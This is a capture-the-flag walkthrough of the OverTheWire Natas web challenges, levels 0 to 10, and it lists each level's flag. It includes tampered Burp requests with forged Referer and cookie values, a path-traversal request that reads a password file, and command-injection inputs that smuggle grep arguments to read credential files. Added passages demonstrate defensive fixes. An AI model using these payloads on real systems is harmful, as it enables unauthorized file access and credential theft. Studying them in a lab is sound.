Natas
This is a collection of challenges built around common web application vulnerabilities.

Level 0

To start off we follow the instructions found at https://overthewire.org/wargames/natas/natas0.html and log into the first challenge at http://natas0.natas.labs.overthewire.org
This challenge is quite simple: the page source contains the password (CTRL+U in Firefox).
Flag: gtVrDuiDfck831PqWsLEZy5gyDz1clto

Level 1

This challenge works exactly the same, but right clicking is blocked. This isn't a problem though since we're using a keyboard shortcut.
Flag: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Level 2

Looking at the source code we see a file referenced at files/pixel.png. Navigating to /files shows that there is a file called users.txt, which contains the flag.
Flag: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Level 3

There is a comment in the source code reading "Not even Google will find this", which hints that a robots.txt file is involved. Checking that file reveals a directory /s3cr3t, which contains a users.txt file holding the flag.
Flag: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 4

This page tells us that valid users only come from http://natas5.natas.labs.overthewire.org/, so we use the following burp request and manually set the Referer value to that endpoint.
Burp Request

GET / HTTP/1.1
Host: natas4.natas.labs.overthewire.org
Referer: http://natas5.natas.labs.overthewire.org/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Flag: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 5

This challenge simply tells us that we aren't logged in. Running the request through burp we see that there is a cookie called loggedin that is set to 0 by default. We modify the request and set the value to 1 as shown below.
Burp Request

GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Connection: close
Cookie: loggedin=1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Flag: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6

This challenge presents a form for submitting a secret and a link to view the source code of the page. In the source we see that it includes includes/secret.inc. Navigating to that file and viewing its source gives us the secret to submit, and submitting it gives us the flag.
Secret: FOEIUWGHFEEUHOFUOIU
Flag: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Level 7

On this challenge we see two links of the form index.php?page=<page>, which screams LFI on basic challenges like this. Using the following Burp request we can read the file /etc/natas_webpass/natas8.
Burp Request

GET /index.php?page=../../../../../etc/natas_webpass/natas8 HTTP/1.1
Host: natas7.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://natas7.natas.labs.overthewire.org/
Authorization: Basic bmF0YXM3Ojd6M2hFRU5qUXRmbHpnblQyOXE3d0F2TU5mWmRoMGk5
Connection: close
Upgrade-Insecure-Requests: 1

Flag: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
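The fix on the server side is to never let the page parameter select an arbitrary path. The following is an added example (my own Python illustration, not code from the Natas challenge or from OverTheWire) of the two usual defences: an allowlist that maps public page names to concrete files, and a realpath check that confines any dynamically built path to a base directory. PAGES_DIR, PAGE_MAP and the function names are constructed for the example.

```python
import os

# Constructed example values: the directory that index.php?page=<page>
# is allowed to include from, and the public names it may serve.
PAGES_DIR = "/var/www/html/pages"
PAGE_MAP = {
    "home": "home.html",
    "about": "about.html",
}


def resolve_by_allowlist(page):
    """Preferred fix: look the page name up in a fixed map.

    Anything not in the map (including '../../../etc/natas_webpass/natas8')
    is rejected, so the request can never name a file on disk directly.
    """
    filename = PAGE_MAP.get(page)
    if filename is None:
        return None
    return os.path.join(PAGES_DIR, filename)


def resolve_by_realpath(page):
    """Fallback when the set of pages is dynamic: build the path, normalise
    it (collapsing every '..' and resolving symlinks), then require that it
    is still strictly inside PAGES_DIR.  A path that escapes is rejected.
    """
    base = os.path.realpath(PAGES_DIR)
    candidate = os.path.realpath(os.path.join(PAGES_DIR, page))
    # commonpath() returns the longest shared prefix directory; it equals the
    # base only when the candidate lives underneath it.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    traversal = "../../../../../etc/natas_webpass/natas8"
    print("allowlist :", resolve_by_allowlist("home"), resolve_by_allowlist(traversal))
    print("realpath  :", resolve_by_realpath("home.html"), resolve_by_realpath(traversal))
```

Note that the realpath check must be applied to the normalised path, not to the raw parameter; a prefix comparison on the unnormalised string would still accept the traversal sequence shown in the request above.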

Level 8

We are given another secret submission form as well as the source code. This time they are using a custom encoding function and checking it against a pre-encoded string. The secret validation code is shown below, as well as my decoding script. Running this gives us the secret.
Secret Submission

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

decoder.py

import base64

def natasDecode(secret):
    # first we convert from hex -> string
    secret = bytearray.fromhex(secret).decode()
    # then we reverse the string
    secret = secret[::-1]
    # then we base64 decode the string
    secret = base64.b64decode(secret)
    # then we convert from bytearray to str for printing
    return secret.decode("utf-8")


plaintext = natasDecode('3d3d516343746d4d6d6c315669563362')
print(plaintext)

Secret: oubWYf2kBq
Flag: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
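The lesson of this level is that an encoding, however many steps it has, is reversible by anyone who can read the source, so it cannot stand in for a password check. The block below is an added example of mine (not code from the challenge or its author): it ports the PHP encodeSecret() to Python so the decoder can be verified by a round trip, and then shows the shape of the check that should have been used, a salted PBKDF2 hash compared in constant time. The salt and iteration count are constructed values for the example.

```python
import base64
import binascii
import hashlib
import hmac


def encode_secret(secret):
    """Python port of the PHP bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode("utf-8")).decode("ascii")
    return binascii.hexlify(b64[::-1].encode("ascii")).decode("ascii")


def decode_secret(encoded):
    """Exact inverse: unhex, reverse, base64-decode.  Works for any input the
    site could have produced, because every step of the 'encoding' is a
    bijection with a public inverse."""
    reversed_b64 = binascii.unhexlify(encoded).decode("ascii")
    return base64.b64decode(reversed_b64[::-1]).decode("utf-8")


def roundtrip_ok(encoded):
    """True when re-encoding the recovered secret reproduces the stored value."""
    return encode_secret(decode_secret(encoded)) == encoded


# --- What a real secret check looks like (constructed parameters) ----------
SALT = b"constructed-example-salt"   # per-secret random bytes in practice
ITERATIONS = 200_000


def hash_secret(secret):
    """One-way, salted, slow: reading this value does not reveal the secret."""
    return hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), SALT, ITERATIONS)


def check_secret(candidate, stored_hash):
    """Constant-time comparison so response timing leaks nothing either."""
    return hmac.compare_digest(hash_secret(candidate), stored_hash)


if __name__ == "__main__":
    stored = "3d3d516343746d4d6d6c315669563362"
    print(decode_secret(stored), roundtrip_ok(stored))
    digest = hash_secret("oubWYf2kBq")
    print(check_secret("oubWYf2kBq", digest), check_secret("wrong", digest))
```

Reading the stored hash does not let a reader reproduce the secret the way reading $encodedSecret did, which is the property the original page lacked.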

Level 9

In this challenge we are given a form whose input is used to run grep via PHP. The input is not sanitized, so we can manipulate the command to read the flag file instead. The original PHP and the input needed to obtain the flag are shown below:
PHP Grep

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

Form Input: -e ".*" /etc/natas_webpass/natas10;
Flag: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 10

This challenge runs the same grep command with PHP, but it filters the user's input first. Our solution still works once we remove the ; from our input: grep then simply searches our file as well as the one defined in the PHP file.
PHP Grep

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

Form Input: -e ".*" /etc/natas_webpass/natas11
Flag: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
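Levels 9 and 10 together show why a character blacklist does not fix command injection: the Level 10 filter removes the command separators, but the interpolated string still reaches a shell, which splits it on whitespace into extra grep arguments. The block below is an added example of my own (not code from the challenge), written in Python rather than PHP so it can be run directly: it tokenises the page's command string the way the shell would, applies the Level 10 blacklist, and contrasts both with a hardened version that passes the needle as a single argv element with no shell involved. The DICTIONARY name and the allowlist pattern are constructed for the example.

```python
import re
import shlex
import subprocess

DICTIONARY = "dictionary.txt"   # constructed: the file the page greps

# Level 10's filter, as written on the page: rejects ; | and & only.
NATAS10_BLACKLIST = re.compile(r"[;|&]")

# Hardened allowlist for a dictionary lookup: one word, bounded length.
NEEDLE_ALLOWLIST = re.compile(r"[A-Za-z0-9]{1,64}")


def vulnerable_command(needle):
    """Mirror of passthru("grep -i $key dictionary.txt"): string interpolation."""
    return f"grep -i {needle} {DICTIONARY}"


def shell_argv(command):
    """What /bin/sh hands to grep after word-splitting and quote removal
    (shlex follows the same rules for the cases that matter here)."""
    return shlex.split(command)


def passes_natas10_filter(needle):
    return NATAS10_BLACKLIST.search(needle) is None


def safe_argv(needle):
    """Hardened form: validate against an allowlist, then build an argument
    vector.  The needle is exactly one element, placed after '--' so grep can
    never read it as an option, and the file list is fixed by the code."""
    if not NEEDLE_ALLOWLIST.fullmatch(needle):
        raise ValueError("needle must be 1-64 alphanumeric characters")
    return ["grep", "-i", "--", needle, DICTIONARY]


def run_safe_grep(needle):
    """Execute without a shell; returns grep's stdout (empty when no match)."""
    result = subprocess.run(safe_argv(needle), capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    level10_input = '-e ".*" /etc/natas_webpass/natas11'
    print("shell sees :", shell_argv(vulnerable_command(level10_input)))
    print("blacklist  :", passes_natas10_filter(level10_input))
    print("hardened   :", safe_argv("password"))
```

The tokenised output makes the failure visible: the Level 10 input contains none of ; | &, yet the shell delivers `-e`, `.*` and a second file name to grep as separate arguments. In PHP the equivalent minimal fix is to validate the needle against an allowlist and wrap it in escapeshellarg() after a `--`; the argv-based form above removes the shell from the picture entirely.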